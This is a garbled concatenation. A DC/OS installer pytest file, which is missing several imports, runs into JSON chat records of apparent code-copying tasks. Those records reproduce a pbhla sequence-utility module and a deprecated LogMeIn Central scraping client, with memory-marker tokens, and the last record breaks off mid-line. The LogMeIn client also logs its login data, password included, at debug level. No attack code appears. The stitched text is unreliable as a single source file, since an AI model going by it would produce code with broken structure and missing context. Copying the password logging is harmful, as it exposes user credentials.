import pytest
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
def test_password_hash():
"""Tests that the password hashing method creates de-cryptable hash
"""
password = 'DcosTestingPassword!@#'
# only reads from STDOUT
hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])
print(hash_pw)
hash_pw = hash_pw.decode('ascii').strip('\n')
assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
"""Test that --set-superuser-hash works"""
with tmpdir.as_cwd():
tmpdir.join('genconf').ensure(dir=True)
# TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml
# Setting in a non-empty config.yaml which has no password set
make_default_config_if_needed('genconf/config.yaml')
assert 'superuser_password_hash' not in Config('genconf/config.yaml').config
# Set the password
create_fake_build_artifacts(tmpdir)
subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))
# Check that config.yaml has the password set
config = Config('genconf/config.yaml')
assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
upgrade_config = """
---
# The name of your DC/OS cluster. Visable in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
create_config(upgrade_config, tmpdir)
create_fake_build_artifacts(tmpdir)
output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
.endswith("dcos_node_upgrade.sh")
try:
subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
except subprocess.CalledProcessError as e:
print(e.output)
assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
else:
raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
version_data = subprocess.check_output(['dcos_installer', '--version']).decode()
assert json.loads(version_data) == {
'version': '1.12-dev',
'variant': 'some-variant'
}
def test_good_create_config_from_post(tmpdir):
"""
Test that it creates the config
"""
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
temp_ip_detect_path = workspace + '/ip-detect'
f = open(temp_ip_detect_path, "w")
f.write("#/bin/bash foo")
good_post_data = {
"agent_list": ["10.0.0.2"],
"master_list": ["10.0.0.1"],
"cluster_name": "Good Test",
"resolvers": ["4.4.4.4"],
"ip_detect_filename": temp_ip_detect_path
}
expected_good_messages = {}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=good_post_data,
config_path=temp_config_path)
assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
bad_post_data = {
"agent_list": "foo",
"master_list": ["foo"],
}
expected_bad_messages = {
"agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
"one because of: Expecting value: line 1 column 1 (char 0)",
"master_list": 'Invalid IPv4 addresses in list: foo',
}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=bad_post_data,
config_path=temp_config_path)
assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
# Create a temp config
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
temp_config_path = str(genconf_dir.join('config.yaml'))
# Initialize with defautls
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
expected_output = {
'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
'ssh_user': 'Must set ssh_user, no way to calculate value.',
'master_list': 'Must set master_list, no way to calculate value.',
'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
}
with tmpdir.as_cwd():
assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
expected_data = {
'cluster_name': 'DC/OS',
'master_discovery': 'static',
'exhibitor_storage_backend': 'static',
'resolvers': ['8.8.8.8', '8.8.4.4'],
'ssh_port': 22,
'process_timeout': 10000,
'bootstrap_url': 'file:///opt/dcos_install_tmp'
}
make_default_config_if_needed(temp_config_path)
config = Config(temp_config_path)
assert expected_data == config.config
def test_determine_config_type(tmpdir):
# Ensure the default created config is of simple type
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
got_output = backend.determine_config_type(config_path=temp_config_path)
expected_output = {
'message': '',
'type': 'minimal',
}
assert got_output == expected_output
def test_success():
mock_config = to_config({
'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
'agent_list': ['10.0.0.3', '10.0.0.4']
})
expected_output = {
"success": "http://10.0.0.1",
"master_count": 3,
"agent_count": 2
}
expected_output_bad = {
"success": "",
"master_count": 0,
"agent_count": 0
}
got_output, code = backend.success(mock_config)
mock_config.update({'master_list': '', 'agent_list': ''})
bad_out, bad_code = backend.success(mock_config)
assert got_output == expected_output
assert code == 200
assert bad_out == expected_output_bad
assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
temp_config_path = tmpdir.strpath + '/config.yaml'
param = ('fake_test_param_name', 'fake_test_param_value')
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=dict([param]),
config_path=temp_config_path)
assert not messages, "unexpected validation error: {}".format(messages)
assert Config(config_path=temp_config_path)[param[0]] == param[1]
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""
def test_do_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
aws_base_config = """---
# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""
def test_do_aws_configure(release_config_aws, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(aws_base_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
@pytest.fixture
def valid_storage_config(release_config_aws):
""" Uses the settings from dcos-release.config.yaml ['testing'] to create a
new upload and then deletes it when the test is over
"""
s3_bucket_name = release_config_aws['bucket']
bucket_path = str(uuid.uuid4())
yield """---
master_list:
- 127.0.0.1
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: {bucket_path}
aws_template_upload: true
""".format(
bucket=release_config_aws['bucket'],
bucket_path=bucket_path)
session = boto3.session.Session()
s3 = session.resource('s3')
s3_bucket = s3.Bucket(s3_bucket_name)
for o in s3_bucket.objects.filter(Prefix=bucket_path):
o.delete()
def test_do_aws_cf_configure_valid_storage_config(release_config_aws, valid_storage_config, tmpdir, monkeypatch):
assert aws_cf_configure(valid_storage_config, tmpdir, monkeypatch) == 0
# TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
# ended up with the correct region where the above testing bucket was created.
def test_override_aws_template_storage_region_name(release_config_aws, valid_storage_config, tmpdir, monkeypatch):
config_str = valid_storage_config
config_str += '\naws_template_storage_region_name: {}'.format(os.environ['AWS_DEFAULT_REGION'])
assert aws_cf_configure(config_str, tmpdir, monkeypatch) == 0
def aws_cf_configure(config, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
return backend.do_aws_cf_configure()
def test_do_configure_valid_config_no_duplicate_logging(tmpdir, monkeypatch, caplog):
"""
Log messages are logged exactly once.
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
# The message comes from gen.get_dcosconfig_source_target_and_templates() function
expected_message = 'Generating configuration files...'
filtered_messages = [rec.message for rec in caplog.records if rec.message == expected_message]
assert [expected_message] == filtered_messages
def test_do_configure_logs_validation_errors(tmpdir, monkeypatch, caplog):
"""
Configuration validation errors are logged as `error` messages.
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
invalid_config = textwrap.dedent("""---
cluster_name: DC/OS
master_discovery: static
# Remove `exhibitor_storage_backend` from configuration
# exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
""")
create_config(invalid_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 1
expected_error_message = (
'exhibitor_storage_backend: Must set exhibitor_storage_backend, '
'no way to calculate value.'
)
error_logs = [rec for rec in caplog.records if rec.message == expected_error_message]
assert len(error_logs) == 1
error_log = error_logs[0]
assert error_log.levelno == logging.ERROR
def create_config(config_str, tmpdir):
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
config_path = genconf_dir.join('config.yaml')
config_path.write(config_str)
genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
artifact_dir = tmpdir.join('artifacts/bootstrap')
artifact_dir.ensure(dir=True)
artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
artifact_dir.join('12345.active.json').write('["package--version"]', ensure=True)
artifact_dir.join('test_variant.bootstrap.latest').write("12345")
tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/complete/complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
```
|
[
{
"content": "Repeat the following code:\n```python\n#! /usr/bin/env python\nfrom pbhla.filenames import get_file_type\n\n__author__ = '[email protected]'\n\nimport logging\nfrom tempfile import NamedTemporaryFile\n\nfrom pbcore.io.FastaIO import FastaRecord, FastaWriter\nfrom pbcore.io.FastqIO import FastqRecord, FastqWriter\nfrom pbhla.io.AmpAnalysisIO import AmpliconAnalysisRecord, AmpliconAnalysisWriter\nfrom pbhla.utils import check_output_file\n\nlog = logging.getLogger()\n\ndef slice_2d( args ):\n \"\"\"\n Convert a __getitems__ input into a pair of slice objects for ease-of-use\n \"\"\"\n if isinstance( args, int ):\n return _to_slice(args), slice(None)\n elif isinstance( args, slice ):\n return args, slice(None)\n elif isinstance( args, tuple ):\n if len(args) > 2:\n raise ValueError(\"Cannot create 2D slice from %s arguments\" % len(args))\n else:\n return (_to_slice(item) for item in args)\n else:\n raise TypeError(\"slice_2d accepts Int, Slice, or Tuple arguments\")\n\ndef _to_slice( item ):\n \"\"\"\n Convert an item from Int to Slice if needed\n \"\"\"\n if isinstance( item, int ):\n return slice( item, item+1 )\n if isinstance( item, slice ):\n return item\n else:\n raise TypeError(\"Input must be Int or Slice\")\n\ndef parse_locus_dict( filename ):\n \"\"\"\n Read a dictionary of values from a file with locus-specific data\n \"\"\"\n data = {}\n with open( filename, 'r' ) as handle:\n for line in handle:\n datum, locus = line.strip().split()\n if locus in data:\n msg = 'Duplicate locus fofn \"%s\"!' % locus\n log.error( msg )\n raise KeyError( msg )\n else:\n data[locus] = datum\n return data\n\ndef get_output_file( input_file, modifier ):\n \"\"\"\n Get a modified output file name based on some input file\n \"\"\"\n basename = '.'.join( input_file.split('.')[:-1] )\n file_type = get_file_type( input_file )\n return '%s.%s.%s' % (basename, modifier, file_type)\n\ndef get_temp_fasta_record( record ):\n \"\"\"\n If a record isn't in Fasta format, try to create a FastaRecord from it\n \"\"\"\n if isinstance( record, FastaRecord ):\n return record\n try:\n return FastaRecord( record.name.strip(), record.sequence.strip() )\n except:\n msg = 'Unrecognized sequence record type'\n log.error( msg )\n raise TypeError( msg )\n\ndef get_temp_fasta( record ):\n \"\"\"\n Create a temporary Fasta file for Blasr/HMMsearch/etc\n \"\"\"\n temp_record = get_temp_fasta_record( record )\n temp_fasta = NamedTemporaryFile( suffix='.fasta' )\n with FastaWriter( temp_fasta.name ) as handle:\n handle.writeRecord( temp_record )\n return temp_fasta\n\ndef write_records( records, filename ):\n if all([isinstance(r, FastaRecord) for r in records]):\n write_fasta_records( records, filename )\n elif all([isinstance(r, FastqRecord) for r in records]):\n write_fastq_records( records, filename )\n elif all([isinstance(r, AmpliconAnalysisRecord) for r in records]):\n write_amp_analysis_records( records, filename )\n else:\n msg = 'Invalid sequence record type'\n log.error( msg )\n raise TypeError( msg )\n\ndef write_fasta_records( records, filename ):\n log.info(\"Writing {0} FastaRecords to {1}\".format(len(records), filename))\n with FastaWriter( filename ) as handle:\n for record in records:\n handle.writeRecord( record )\n check_output_file( filename )\n\ndef write_fastq_records( records, filename ):\n log.info(\"Writing {0} FastqRecords to {1}\".format(len(records), filename))\n with FastqWriter( filename ) as handle:\n for record in records:\n handle.writeRecord( record )\n check_output_file( filename )\n\ndef write_amp_analysis_records( records, filename ):\n log.info(\"Writing {0} AmpAnalysisRecords to {1}\".format(len(records), filename))\n with AmpliconAnalysisWriter( filename ) as handle:\n for record in records:\n handle.write_fasta( record )\n check_output_file( filename )\n\ndef get_unique_records( records ):\n \"\"\"Remove redundant sequences, primarily to avoid confusing Quiver\"\"\"\n sorted_records = sorted(records, key=lambda r: len(r.sequence), reverse=True)\n\n unique_sequences = []\n unique_records = []\n for record in sorted_records:\n is_unique = True\n for sequence in unique_sequences:\n if record.sequence in sequence:\n is_unique = False\n break\n if is_unique:\n unique_records.append( record )\n unique_sequences.append( record.sequence )\n\n return unique_records\n```",
"role": "user"
}
] |
[
{
"content": "Repeat the following code:\n<|memory_start|>```python\n#! /usr/bin/env python\nfrom pbhla.filenames import get_file_type\n\n__author__ = '[email protected]'\n\nimport logging\nfrom tempfile import NamedTemporaryFile\n\nfrom pbcore.io.FastaIO import FastaRecord, FastaWriter\nfrom pbcore.io.FastqIO import FastqRecord, FastqWriter\nfrom pbhla.io.AmpAnalysisIO import AmpliconAnalysisRecord, AmpliconAnalysisWriter\nfrom pbhla.utils import check_output_file\n\nlog = logging.getLogger()\n\ndef slice_2d( args ):\n \"\"\"\n Convert a __getitems__ input into a pair of slice objects for ease-of-use\n \"\"\"\n if isinstance( args, int ):\n return _to_slice(args), slice(None)\n elif isinstance( args, slice ):\n return args, slice(None)\n elif isinstance( args, tuple ):\n if len(args) > 2:\n raise ValueError(\"Cannot create 2D slice from %s arguments\" % len(args))\n else:\n return (_to_slice(item) for item in args)\n else:\n raise TypeError(\"slice_2d accepts Int, Slice, or Tuple arguments\")\n\ndef _to_slice( item ):\n \"\"\"\n Convert an item from Int to Slice if needed\n \"\"\"\n if isinstance( item, int ):\n return slice( item, item+1 )\n if isinstance( item, slice ):\n return item\n else:\n raise TypeError(\"Input must be Int or Slice\")\n\ndef parse_locus_dict( filename ):\n \"\"\"\n Read a dictionary of values from a file with locus-specific data\n \"\"\"\n data = {}\n with open( filename, 'r' ) as handle:\n for line in handle:\n datum, locus = line.strip().split()\n if locus in data:\n msg = 'Duplicate locus fofn \"%s\"!' % locus\n log.error( msg )\n raise KeyError( msg )\n else:\n data[locus] = datum\n return data\n\ndef get_output_file( input_file, modifier ):\n \"\"\"\n Get a modified output file name based on some input file\n \"\"\"\n basename = '.'.join( input_file.split('.')[:-1] )\n file_type = get_file_type( input_file )\n return '%s.%s.%s' % (basename, modifier, file_type)\n\ndef get_temp_fasta_record( record ):\n \"\"\"\n If a record isn't in Fasta format, try to create a FastaRecord from it\n \"\"\"\n if isinstance( record, FastaRecord ):\n return record\n try:\n return FastaRecord( record.name.strip(), record.sequence.strip() )\n except:\n msg = 'Unrecognized sequence record type'\n log.error( msg )\n raise TypeError( msg )\n\ndef get_temp_fasta( record ):\n \"\"\"\n Create a temporary Fasta file for Blasr/HMMsearch/etc\n \"\"\"\n temp_record = get_temp_fasta_record( record )\n temp_fasta = NamedTemporaryFile( suffix='.fasta' )\n with FastaWriter( temp_fasta.name ) as handle:\n handle.writeRecord( temp_record )\n return temp_fasta\n\ndef write_records( records, filename ):\n if all([isinstance(r, FastaRecord) for r in records]):\n write_fasta_records( records, filename )\n elif all([isinstance(r, FastqRecord) for r in records]):\n write_fastq_records( records, filename )\n elif all([isinstance(r, AmpliconAnalysisRecord) for r in records]):\n write_amp_analysis_records( records, filename )\n else:\n msg = 'Invalid sequence record type'\n log.error( msg )\n raise TypeError( msg )\n\ndef write_fasta_records( records, filename ):\n log.info(\"Writing {0} FastaRecords to {1}\".format(len(records), filename))\n with FastaWriter( filename ) as handle:\n for record in records:\n handle.writeRecord( record )\n check_output_file( filename )\n\ndef write_fastq_records( records, filename ):\n log.info(\"Writing {0} FastqRecords to {1}\".format(len(records), filename))\n with FastqWriter( filename ) as handle:\n for record in records:\n handle.writeRecord( record )\n check_output_file( filename )\n\ndef write_amp_analysis_records( records, filename ):\n log.info(\"Writing {0} AmpAnalysisRecords to {1}\".format(len(records), filename))\n with AmpliconAnalysisWriter( filename ) as handle:\n for record in records:\n handle.write_fasta( record )\n check_output_file( filename )\n\ndef get_unique_records( records ):\n \"\"\"Remove redundant sequences, primarily to avoid confusing Quiver\"\"\"\n sorted_records = sorted(records, key=lambda r: len(r.sequence), reverse=True)\n\n unique_sequences = []\n unique_records = []\n for record in sorted_records:\n is_unique = True\n for sequence in unique_sequences:\n if record.sequence in sequence:\n is_unique = False\n break\n if is_unique:\n unique_records.append( record )\n unique_sequences.append( record.sequence )\n\n return unique_records\n```<|memory_end|>",
"role": "user"
}
] |
```python
#! /usr/bin/env python
from pbhla.filenames import get_file_type
__author__ = '[email protected]'
import logging
from tempfile import NamedTemporaryFile
from pbcore.io.FastaIO import FastaRecord, FastaWriter
from pbcore.io.FastqIO import FastqRecord, FastqWriter
from pbhla.io.AmpAnalysisIO import AmpliconAnalysisRecord, AmpliconAnalysisWriter
from pbhla.utils import check_output_file
log = logging.getLogger()
def slice_2d( args ):
"""
Convert a __getitems__ input into a pair of slice objects for ease-of-use
"""
if isinstance( args, int ):
return _to_slice(args), slice(None)
elif isinstance( args, slice ):
return args, slice(None)
elif isinstance( args, tuple ):
if len(args) > 2:
raise ValueError("Cannot create 2D slice from %s arguments" % len(args))
else:
return (_to_slice(item) for item in args)
else:
raise TypeError("slice_2d accepts Int, Slice, or Tuple arguments")
def _to_slice( item ):
"""
Convert an item from Int to Slice if needed
"""
if isinstance( item, int ):
return slice( item, item+1 )
if isinstance( item, slice ):
return item
else:
raise TypeError("Input must be Int or Slice")
def parse_locus_dict( filename ):
"""
Read a dictionary of values from a file with locus-specific data
"""
data = {}
with open( filename, 'r' ) as handle:
for line in handle:
datum, locus = line.strip().split()
if locus in data:
msg = 'Duplicate locus fofn "%s"!' % locus
log.error( msg )
raise KeyError( msg )
else:
data[locus] = datum
return data
def get_output_file( input_file, modifier ):
"""
Get a modified output file name based on some input file
"""
basename = '.'.join( input_file.split('.')[:-1] )
file_type = get_file_type( input_file )
return '%s.%s.%s' % (basename, modifier, file_type)
def get_temp_fasta_record( record ):
"""
If a record isn't in Fasta format, try to create a FastaRecord from it
"""
if isinstance( record, FastaRecord ):
return record
try:
return FastaRecord( record.name.strip(), record.sequence.strip() )
except:
msg = 'Unrecognized sequence record type'
log.error( msg )
raise TypeError( msg )
def get_temp_fasta( record ):
"""
Create a temporary Fasta file for Blasr/HMMsearch/etc
"""
temp_record = get_temp_fasta_record( record )
temp_fasta = NamedTemporaryFile( suffix='.fasta' )
with FastaWriter( temp_fasta.name ) as handle:
handle.writeRecord( temp_record )
return temp_fasta
def write_records( records, filename ):
if all([isinstance(r, FastaRecord) for r in records]):
write_fasta_records( records, filename )
elif all([isinstance(r, FastqRecord) for r in records]):
write_fastq_records( records, filename )
elif all([isinstance(r, AmpliconAnalysisRecord) for r in records]):
write_amp_analysis_records( records, filename )
else:
msg = 'Invalid sequence record type'
log.error( msg )
raise TypeError( msg )
def write_fasta_records( records, filename ):
log.info("Writing {0} FastaRecords to {1}".format(len(records), filename))
with FastaWriter( filename ) as handle:
for record in records:
handle.writeRecord( record )
check_output_file( filename )
def write_fastq_records( records, filename ):
log.info("Writing {0} FastqRecords to {1}".format(len(records), filename))
with FastqWriter( filename ) as handle:
for record in records:
handle.writeRecord( record )
check_output_file( filename )
def write_amp_analysis_records( records, filename ):
log.info("Writing {0} AmpAnalysisRecords to {1}".format(len(records), filename))
with AmpliconAnalysisWriter( filename ) as handle:
for record in records:
handle.write_fasta( record )
check_output_file( filename )
def get_unique_records( records ):
"""Remove redundant sequences, primarily to avoid confusing Quiver"""
sorted_records = sorted(records, key=lambda r: len(r.sequence), reverse=True)
unique_sequences = []
unique_records = []
for record in sorted_records:
is_unique = True
for sequence in unique_sequences:
if record.sequence in sequence:
is_unique = False
break
if is_unique:
unique_records.append( record )
unique_sequences.append( record.sequence )
return unique_records
```
|
[
{
"content": "Produce an exact reconstruction of the code:\n```python\n# Python\nimport json\nimport logging\nimport re\nimport urllib\nimport urlparse\nimport warnings\nimport webbrowser\n\n# Requests\nimport requests\n\n# BeautifulSoup4\nfrom bs4 import BeautifulSoup\n\n__all__ = ['LogMeInCentralAPI']\n\nlogger = logging.getLogger('lmiapi.central')\n\n\nclass LogMeInCentralAPI(object): # pragma: no cover\n\n API_ROOT = 'https://secure.logmein.com/api/'\n\n def __init__(self, email, password):\n warnings.warn('The LogMeInCentralAPI class is no longer maintained or '\n 'supported; use LogMeInPublicAPI instead.',\n DeprecationWarning)\n self.email = email\n self.password = password\n self.session = requests.Session()\n self.session.headers.update({'Accept': 'application/JSON'})\n self.current_profile_id = None\n\n def _post(self, path, data=None):\n url = '%s%s' % (self.API_ROOT, path.lstrip('/'))\n headers = {'Content-Type': 'application/JSON'}\n data = json.dumps(data or {})\n response = self.session.post(url, data=data, headers=headers)\n if response.status_code == 401 and self.login():\n response = self.session.post(url, data=data, headers=headers)\n response.raise_for_status()\n logger.debug('POST %s -> %d', url, response.status_code)\n return response.json()\n\n def _update_current_profile_id(self, soup):\n profile_id = None\n alt_link = soup.find('link', rel='alternate', href=re.compile(r'^.*?profileid=\\d+?.*?$'))\n if alt_link:\n alt_parts = urlparse.urlsplit(alt_link['href'])\n alt_query = urlparse.parse_qs(alt_parts.query)\n profile_id = int(alt_query.get('profileid', ['0'])[0])\n self.current_profile_id = profile_id or None\n logger.debug('current profile id: %s', str(self.current_profile_id))\n return self.current_profile_id\n\n def login(self):\n # Read main LogMeIn page at secure.logmein.com.\n url = urlparse.urljoin(self.API_ROOT, '/')\n response = self.session.get(url)\n response.raise_for_status()\n # Find login button link.\n soup = BeautifulSoup(response.text)\n btn_login = soup.find('a', attrs={'class': 'btn-login', 'href': True})\n if not btn_login:\n raise RuntimeError('Unable to find login button link!')\n login_url = urlparse.urljoin(response.url, btn_login['href'])\n # Follow the login link.\n response = self.session.get(login_url)\n response.raise_for_status()\n # Try to find the current profile ID in the response. If found, we're\n # already logged in.\n soup = BeautifulSoup(response.text)\n profile_id = self._update_current_profile_id(soup)\n if profile_id:\n return profile_id\n # Otherwise, we were redirected to the login page, so find the login\n # form and build up the auth data to send.\n form = soup.find('form', id='form', action=True)\n if not form:\n raise RuntimeError('No login form could be found!')\n auth_url = urlparse.urljoin(response.url, form['action'])\n auth_method = form.attrs.get('method', 'POST').lower()\n fields = form.find_all('input', attrs={'name': True})\n auth_data = {}\n for field in fields:\n name = field['name']\n if name == 'email':\n value = self.email\n elif name == 'password':\n value = self.password\n else:\n value = field.attrs.get('value', '')\n auth_data[name] = value\n # Now submit the login form with the auth data filled in.\n logger.debug('auth url: %s %s', auth_method.upper(), auth_url)\n logger.debug('auth data: %r', auth_data)\n response = getattr(self.session, auth_method)(auth_url, auth_data)\n response.raise_for_status()\n # Look for the current profile ID in the response.\n soup = BeautifulSoup(response.text)\n return self._update_current_profile_id(soup)\n\n def select_profile(self, profile_id):\n # Get the URL used to switch to a new profile.\n url = urlparse.urljoin(self.API_ROOT, '/login/selectprofile.aspx?profile=%d' % profile_id)\n response = self.session.get(url)\n response.raise_for_status()\n # Look for the new profile ID in the response.\n soup = BeautifulSoup(response.text)\n return self._update_current_profile_id(soup)\n\n def get_user_profile_list(self):\n result = self._post('ProfileList.svc/GetUserProfileList')\n return dict([(x['Id'], x['Name']) for x in result['GetUserProfileListResult']['List']])\n\n def get_all_hosts(self):\n result = self._post('Computers.svc/GetAllHostsForCentral')\n return result\n\n def get_host_details(self, host_id):\n url = urlparse.urljoin(self.API_ROOT, '/mycomputers_preferences.asp')\n response = self.session.get(url, params={'hostid': host_id})\n response.raise_for_status()\n soup = BeautifulSoup(response.text)\n host_details = {}\n for hostid_input in soup.select('fieldset > input[name=\"hostid\"]'):\n host_details[u'hostid'] = int(hostid_input['value'])\n for profileid_input in soup.select('fieldset input[name=\"profileid\"]'):\n host_details[u'profileid'] = int(profileid_input['value'])\n for tr in soup.select('fieldset table tr'):\n for n, td in enumerate(tr.find_all('td', recursive=False)):\n if n == 0:\n key_parts = td.get_text(strip=True).replace(':', '').split()\n key_parts = [x.strip().title() for x in key_parts]\n key_parts[0] = key_parts[0].lower()\n key = u''.join(key_parts)\n if key == 'status':\n key = u'statusString'\n elif key == 'group':\n key = u'groupName'\n elif n == 1:\n if key == 'computerDescription':\n value = td.find('input', attrs={'name': 'desc'})['value']\n elif key == 'statusString':\n value = td.get_text('|', strip=True).split('|')[0]\n a_tag = td.find('a', href=True)\n if a_tag:\n host_details[u'connectUrl'] = urlparse.urljoin(response.url, a_tag['href'])\n elif key == 'groupName':\n selected_option = td.find('option', selected=True)\n value = selected_option.get_text()\n host_details[u'groupid'] = int(selected_option['value'])\n elif key == 'note':\n value = td.find('textarea').get_text()\n else:\n value = td.get_text(strip=True)\n host_details[key] = value\n return host_details\n\n def get_host_av_info(self, host_id):\n result = self._post('AntiVirus.svc/GetHostAVInfo', {'hostId': host_id})\n return result['GetHostAVInfoResult']\n\n def connect_to_host(self, host_id):\n url = urlparse.urljoin(self.API_ROOT, '/mycomputers_connect.asp')\n qs = urllib.urlencode({'hostid': host_id})\n url = '%s?%s' % (url, qs)\n webbrowser.open_new_tab(url)\n return\n response = self.session.get(url, params={'hostid': host_id})\n response.raise_for_status()\n soup = BeautifulSoup(response.text)\n meta = soup.find('meta', attrs={'http-equiv': 'refresh', 'content': True})\n url = meta['content'].split(';URL=', 1)[1]\n response = self.session.get(url)\n```\nCharacter-for-character where possible.",
"role": "user"
}
] |
[
{
"content": "Produce an exact reconstruction of the code:\n<|memory_start|>```python\n# Python\nimport json\nimport logging\nimport re\nimport urllib\nimport urlparse\nimport warnings\nimport webbrowser\n\n# Requests\nimport requests\n\n# BeautifulSoup4\nfrom bs4 import BeautifulSoup\n\n__all__ = ['LogMeInCentralAPI']\n\nlogger = logging.getLogger('lmiapi.central')\n\n\nclass LogMeInCentralAPI(object): # pragma: no cover\n\n API_ROOT = 'https://secure.logmein.com/api/'\n\n def __init__(self, email, password):\n warnings.warn('The LogMeInCentralAPI class is no longer maintained or '\n 'supported; use LogMeInPublicAPI instead.',\n DeprecationWarning)\n self.email = email\n self.password = password\n self.session = requests.Session()\n self.session.headers.update({'Accept': 'application/JSON'})\n self.current_profile_id = None\n\n def _post(self, path, data=None):\n url = '%s%s' % (self.API_ROOT, path.lstrip('/'))\n headers = {'Content-Type': 'application/JSON'}\n data = json.dumps(data or {})\n response = self.session.post(url, data=data, headers=headers)\n if response.status_code == 401 and self.login():\n response = self.session.post(url, data=data, headers=headers)\n response.raise_for_status()\n logger.debug('POST %s -> %d', url, response.status_code)\n return response.json()\n\n def _update_current_profile_id(self, soup):\n profile_id = None\n alt_link = soup.find('link', rel='alternate', href=re.compile(r'^.*?profileid=\\d+?.*?$'))\n if alt_link:\n alt_parts = urlparse.urlsplit(alt_link['href'])\n alt_query = urlparse.parse_qs(alt_parts.query)\n profile_id = int(alt_query.get('profileid', ['0'])[0])\n self.current_profile_id = profile_id or None\n logger.debug('current profile id: %s', str(self.current_profile_id))\n return self.current_profile_id\n\n def login(self):\n # Read main LogMeIn page at secure.logmein.com.\n url = urlparse.urljoin(self.API_ROOT, '/')\n response = self.session.get(url)\n response.raise_for_status()\n # Find login button link.\n soup = BeautifulSoup(response.text)\n btn_login = soup.find('a', attrs={'class': 'btn-login', 'href': True})\n if not btn_login:\n raise RuntimeError('Unable to find login button link!')\n login_url = urlparse.urljoin(response.url, btn_login['href'])\n # Follow the login link.\n response = self.session.get(login_url)\n response.raise_for_status()\n # Try to find the current profile ID in the response. If found, we're\n # already logged in.\n soup = BeautifulSoup(response.text)\n profile_id = self._update_current_profile_id(soup)\n if profile_id:\n return profile_id\n # Otherwise, we were redirected to the login page, so find the login\n # form and build up the auth data to send.\n form = soup.find('form', id='form', action=True)\n if not form:\n raise 